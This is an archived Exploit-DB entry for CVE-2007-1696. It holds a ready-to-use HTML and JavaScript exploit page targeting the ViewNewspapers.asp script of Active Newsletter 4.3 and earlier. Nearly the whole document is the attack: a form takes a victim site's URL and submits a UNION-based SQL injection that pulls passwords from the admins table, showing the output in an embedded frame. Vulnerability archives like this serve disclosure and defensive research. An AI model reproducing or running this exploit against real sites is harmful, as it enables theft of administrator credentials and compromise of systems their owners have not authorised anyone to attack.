Active Newsletter <= 4.3 ViewNewspapers.asp SQL Injection Exploit

2007-03-23T00:00:00
ID EDB-ID:3556
Type exploitdb
Reporter ajann
Modified 2007-03-23T00:00:00

Description

Active Newsletter <= 4.3 (ViewNewspapers.asp) SQL Injection Exploit. CVE-2007-1696. Webapps exploit for asp platform

                                        
                                            &lt;html&gt;
&lt;head&gt;
&lt;meta http-equiv="Content-Type" content="text/html; charset=windows-1254"&gt;
&lt;title&gt;Active Newsletter &lt;= V.4.3 (ViewNewspapers.asp) Remote SQL Injection Exploit&lt;/title&gt;

&lt;script language="JavaScript"&gt;
 
//'===============================================================================================
//'[Script Name: Active Newsletter &lt;= V.4.3 (ViewNewspapers.asp) Remote SQL Injection Exploit
//'[Coded by   : ajann
//'[Author     : ajann
//'[Contact    : :(
//'[S.Page     : http://www.activewebsoftwares.com
//'[$$         : $ 499.00
//'[Using      : Write Target after Submit Click
//'===============================================================================================

//# ajann,Turkey
//# ...

   

     //Basic exploit,but any time : ( 
   var path="/"
   var adres="/ViewNewspapers.asp?" //File name
   var acik ="NewsPaperID=" // Line x
   var sql = "-34535353534%20union%20select%20password%20from%20admins"
  
   function command(){
       if (document.rfi.target1.value==""){
          alert("Failed..");
      return false;
    }


  
  rfi.action= document.rfi.target1.value+path+adres+acik+sql; // Ready Target : )
  rfi.submit(); // Form Submit
   }
&lt;/script&gt;

&lt;/head&gt;

&lt;body bgcolor="#000000"&gt;
&lt;center&gt;

&lt;p&gt;&lt;b&gt;&lt;font face="Verdana" size="2" color="#008000"&gt;Active Newsletter &lt;= V.4.3 (ViewNewspapers.asp) Remote SQL Injection Exploit&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;&lt;/p&gt;
&lt;form method="post" target="getting" name="rfi" onSubmit="command();"&gt;
    &lt;b&gt;&lt;font face="Arial" size="1" color="#FF0000"&gt;Target:&lt;/font&gt;&lt;font face="Arial" size="1" color="#808080"&gt;[http://[target]/[scriptpath]&lt;/font&gt;&lt;font color="#00FF00" size="2" face="Arial"&gt;
  &lt;/font&gt;&lt;font color="#FF0000" size="2"&gt;&nbsp;&lt;/font&gt;&lt;/b&gt;
  &lt;input type="text" name="target1" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';"&gt;&lt;/p&gt;
  &lt;p&gt;&lt;input type="submit" value="Gonder" name="B1"&gt;&lt;input type="reset" value="Sifirla" name="B2"&gt;&lt;/p&gt;
&lt;/form&gt;
&lt;p&gt;&lt;br&gt;
&lt;iframe name="getting" height="337" width="633" scrolling="yes" frameborder="0"&gt;&lt;/iframe&gt;
&lt;/p&gt;

&lt;b&gt;&lt;font face="Verdana" size="2" color="#008000"&gt;ajann&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
&lt;/center&gt;
&lt;/body&gt;

&lt;/html&gt;

# milw0rm.com [2007-03-23]